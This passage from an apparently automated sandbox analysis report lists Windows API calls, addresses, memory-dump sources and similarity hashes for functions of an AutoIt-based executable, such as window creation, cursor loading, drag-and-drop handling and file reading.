                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00692949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0069297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00692990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 006929AE
                                                            • GetStockObject.GDI32(00000011), ref: 006929CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 006929D5
                                                              • Part of subcall function 00692344: GetCursorPos.USER32(?), ref: 00692357
                                                              • Part of subcall function 00692344: ScreenToClient.USER32(007557B0,?), ref: 00692374
                                                              • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                              • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00691256), ref: 006929FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 7c36d239012f675505405756aabe2b36cb63bcce563978434c38582e205d8bbb
                                                            • Instruction ID: 19dad10eef15aaa72a635389456c2b077775ae68fa35f337c995ab7aa9969f6c
                                                            • Opcode Fuzzy Hash: 7c36d239012f675505405756aabe2b36cb63bcce563978434c38582e205d8bbb
                                                            • Instruction Fuzzy Hash: 2AB13D7160020AEFDF14DFA8DD55BED7BBAFB08311F108129FA15A62E0DB78A851CB54
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006EA47A
                                                            • __swprintf.LIBCMT ref: 006EA51B
                                                            • _wcscmp.LIBCMT ref: 006EA52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006EA583
                                                            • _wcscmp.LIBCMT ref: 006EA5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 006EA5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 006EA648
                                                            • GetWindowRect.USER32(?,?), ref: 006EA67E
                                                            • GetParent.USER32(?), ref: 006EA69C
                                                            • ScreenToClient.USER32(00000000), ref: 006EA6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006EA71D
                                                            • _wcscmp.LIBCMT ref: 006EA731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006EA757
                                                            • _wcscmp.LIBCMT ref: 006EA76B
                                                              • Part of subcall function 006B362C: _iswctype.LIBCMT ref: 006B3634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 9c394c6181ce9ed38d20b3df5eaf63302bc69d7a8df63aa4d293517601f9817d
                                                            • Instruction ID: dd73de23b347d9b22ec9255ee323ce09b831caee524e96d3adc469f18f03d5ea
                                                            • Opcode Fuzzy Hash: 9c394c6181ce9ed38d20b3df5eaf63302bc69d7a8df63aa4d293517601f9817d
                                                            • Instruction Fuzzy Hash: D0A1DF71205346AFDB14DFA5C884BEAB7EAFF44314F008629F999C6290DB30F955CB92
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 006EAF18
                                                            • _wcscmp.LIBCMT ref: 006EAF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 006EAF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 006EAF6E
                                                            • _wcscmp.LIBCMT ref: 006EAF8C
                                                            • _wcsstr.LIBCMT ref: 006EAF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 006EAFD5
                                                            • _wcscmp.LIBCMT ref: 006EAFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 006EB00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 006EB055
                                                            • _wcscmp.LIBCMT ref: 006EB065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 006EB08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 006EB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 041c523de56ab69e9aff6af1e9cd6d612805ef6620ea3d83b04ca1afd590e030
                                                            • Instruction ID: 2a1ffe0140902564d02248cf084403f8be3eb5fb7946b0ccc2c77e7a357ca26b
                                                            • Opcode Fuzzy Hash: 041c523de56ab69e9aff6af1e9cd6d612805ef6620ea3d83b04ca1afd590e030
                                                            • Instruction Fuzzy Hash: EF81DE711093859BDB00DF16C881BEB77EAEF44314F04846EFD858A295DB34ED89CBA5
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0071C627
                                                              • Part of subcall function 0071AB37: ClientToScreen.USER32(?,?), ref: 0071AB60
                                                              • Part of subcall function 0071AB37: GetWindowRect.USER32(?,?), ref: 0071ABD6
                                                              • Part of subcall function 0071AB37: PtInRect.USER32(?,?,0071C014), ref: 0071ABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0071C690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0071C69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0071C6BE
                                                            • _wcscat.LIBCMT ref: 0071C6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0071C705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0071C71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0071C735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0071C757
                                                            • DragFinish.SHELL32(?), ref: 0071C75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0071C851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbu
                                                            • API String ID: 169749273-3108296618
                                                            • Opcode ID: 5315ae5921f8df5ff91ffa0e1b87f2efb3fad3e865387ecd8bcb67496e346929
                                                            • Instruction ID: 0aae95c62c379e0c3b4372cc9909968ac004dd741fad63fdcd8d8a49a1280762
                                                            • Opcode Fuzzy Hash: 5315ae5921f8df5ff91ffa0e1b87f2efb3fad3e865387ecd8bcb67496e346929
                                                            • Instruction Fuzzy Hash: A5618D71108300AFCB01EF68DC85DAFBBE9EF89310F00492EF591961E1DB74A949CB56
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: ceb8095f30b6aa9a8e777b90a635c506d22f93376d5eaa7ab3e98781be2562dd
                                                            • Instruction ID: 3b2c41ca7d8d3cbe92ce2bdf204c8c7a7f8b8ec5f5365e7c68da88f2713a2274
                                                            • Opcode Fuzzy Hash: ceb8095f30b6aa9a8e777b90a635c506d22f93376d5eaa7ab3e98781be2562dd
                                                            • Instruction Fuzzy Hash: C731E4B0648345AADE08EAA5DD03EFE77AB9F10B10F60442DF402715D1EF156F04C65A
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00705013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0070501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00705029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00705034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 0070503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0070504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00705055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00705060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0070506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00705076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00705081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0070508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00705097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 007050A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 007050AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 007050B8
                                                            • GetCursorInfo.USER32(?), ref: 007050C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: ec9192362fb1f4451f72a78bef539cb2a333dc4e5193ee6d8fb5a5dcfc824ae0
                                                            • Instruction ID: 32a651c07c40d5ee175b0311154ebdb51f2a4d8913a0b4dfc2d6d0d41f552ea7
                                                            • Opcode Fuzzy Hash: ec9192362fb1f4451f72a78bef539cb2a333dc4e5193ee6d8fb5a5dcfc824ae0
                                                            • Instruction Fuzzy Hash: 193105B1D4831DAADF109FB68C8999FBFE8FF04750F50452AE50DE7280DA78A5008FA5
                                                            APIs
                                                            • _memset.LIBCMT ref: 0071A259
                                                            • DestroyWindow.USER32(?,?), ref: 0071A2D3
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0071A34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0071A36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A382
                                                            • DestroyWindow.USER32(00000000), ref: 0071A3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00690000,00000000), ref: 0071A3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A3F4
                                                            • GetDesktopWindow.USER32 ref: 0071A40D
                                                            • GetWindowRect.USER32(00000000), ref: 0071A414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0071A42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0071A444
                                                              • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: f114c0951ea002a1912502ed33b9066531d26e8c27b8fc48fd4c6b59762498e2
                                                            • Instruction ID: 0132c6aa821430885c260c320b4a6c6b4c29bd5924d92566b243d86b54f4f37a
                                                            • Opcode Fuzzy Hash: f114c0951ea002a1912502ed33b9066531d26e8c27b8fc48fd4c6b59762498e2
                                                            • Instruction Fuzzy Hash: 54716A70140345AFDB25CF2CCC49FAA7BE6FB88700F04852DF985872A0D7B9A946CB56
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00714424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0071446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 33328fcfda6c3e2beb548e952469477647d83b25f7d37f3aa4a44e8f804cce7d
                                                            • Instruction ID: 0d47dce9c3151f6bbb1c6631b5b7d2a55d4d66ad5caf39b945ec88e2e8365099
                                                            • Opcode Fuzzy Hash: 33328fcfda6c3e2beb548e952469477647d83b25f7d37f3aa4a44e8f804cce7d
                                                            • Instruction Fuzzy Hash: DF91A0702003018FCF44EF28C451AAEB7E6AF95354F14886CF8965B7A2DB34ED89CB95
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0071B8B4
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007191C2), ref: 0071B910
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071B949
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0071B98C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0071B9C3
                                                            • FreeLibrary.KERNEL32(?), ref: 0071B9CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0071B9DF
                                                            • DestroyIcon.USER32(?,?,?,?,?,007191C2), ref: 0071B9EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0071BA0B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0071BA17
                                                              • Part of subcall function 006B2EFD: __wcsicmp_l.LIBCMT ref: 006B2F86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: a30abaaa7cfe3b9abdd5cbaac94f71468433d7d33c00ede4b874aa229c8383fa
                                                            • Instruction ID: a6b876f696a41f5f53150133f28f556d31c66444374436e47bd27b0f6446eab2
                                                            • Opcode Fuzzy Hash: a30abaaa7cfe3b9abdd5cbaac94f71468433d7d33c00ede4b874aa229c8383fa
                                                            • Instruction Fuzzy Hash: CB61B0B1500219FAEB14DF68DC45FFE7BACEB08710F108619FA15D61D1DB78A981DBA0
                                                            APIs
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 006FA3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 006FA418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006FA4C5
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 7ddf521c9b1e02bab97f343e5d9e5a005e5dd8227b441217cd61c11e9a6f2b40
                                                            • Instruction ID: e77d6c8d1ad034d77318cd62244ef35f7e2dd225958c05a58390919044229d2c
                                                            • Opcode Fuzzy Hash: 7ddf521c9b1e02bab97f343e5d9e5a005e5dd8227b441217cd61c11e9a6f2b40
                                                            • Instruction Fuzzy Hash: 72518FB11143089FCB80EF24C88196EB7E9FF84718F10886DF89A57651DB31ED0ACB56
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,006CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 006EF8DF
                                                            • LoadStringW.USER32(00000000,?,006CE029,00000001), ref: 006EF8E8
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,006CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 006EF90A
                                                            • LoadStringW.USER32(00000000,?,006CE029,00000001), ref: 006EF90D
                                                            • __swprintf.LIBCMT ref: 006EF95D
                                                            • __swprintf.LIBCMT ref: 006EF96E
                                                            • _wprintf.LIBCMT ref: 006EFA17
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006EFA2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 984253442-2268648507
                                                            • Opcode ID: 2b3068b3ffc617182f259aecf69c3f1bdc45416a8353a8b0ebfc3ba46a00e05a
                                                            • Instruction ID: b42af5e622830fa9688ae14c0fd11b8b163ec0547422a28446746a7663b63ce0
                                                            • Opcode Fuzzy Hash: 2b3068b3ffc617182f259aecf69c3f1bdc45416a8353a8b0ebfc3ba46a00e05a
                                                            • Instruction Fuzzy Hash: 43413A7290120DAACF45FBE4DD86EEEB77EAF14300F500069F50666092EA356F49CB69
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00719207,?,?), ref: 0071BA56
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA6D
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA78
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA85
                                                            • GlobalLock.KERNEL32(00000000), ref: 0071BA8E
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BA9D
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0071BAA6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BAAD
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00719207,?,?,00000000,?), ref: 0071BABE
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00722CAC,?), ref: 0071BAD7
                                                            • GlobalFree.KERNEL32(00000000), ref: 0071BAE7
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0071BB0B
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0071BB36
                                                            • DeleteObject.GDI32(00000000), ref: 0071BB5E
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0071BB74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: 0bdbae83b8f9862f53316b9dacec3dbb98f882ae276a9fed4b32978f3d037048
                                                            • Instruction ID: efcb5d5242b8ddf7e3c58ad63298303a07800bc85b8141beafc85f5a70d414ff
                                                            • Opcode Fuzzy Hash: 0bdbae83b8f9862f53316b9dacec3dbb98f882ae276a9fed4b32978f3d037048
                                                            • Instruction Fuzzy Hash: 63410875600208EFDB219F69DC88EEA7BB8FF89711F108069F909D72A0D7789941DB64
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 006FDA10
                                                            • _wcscat.LIBCMT ref: 006FDA28
                                                            • _wcscat.LIBCMT ref: 006FDA3A
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006FDA4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006FDA63
                                                            • GetFileAttributesW.KERNEL32(?), ref: 006FDA7B
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 006FDA95
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006FDAA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
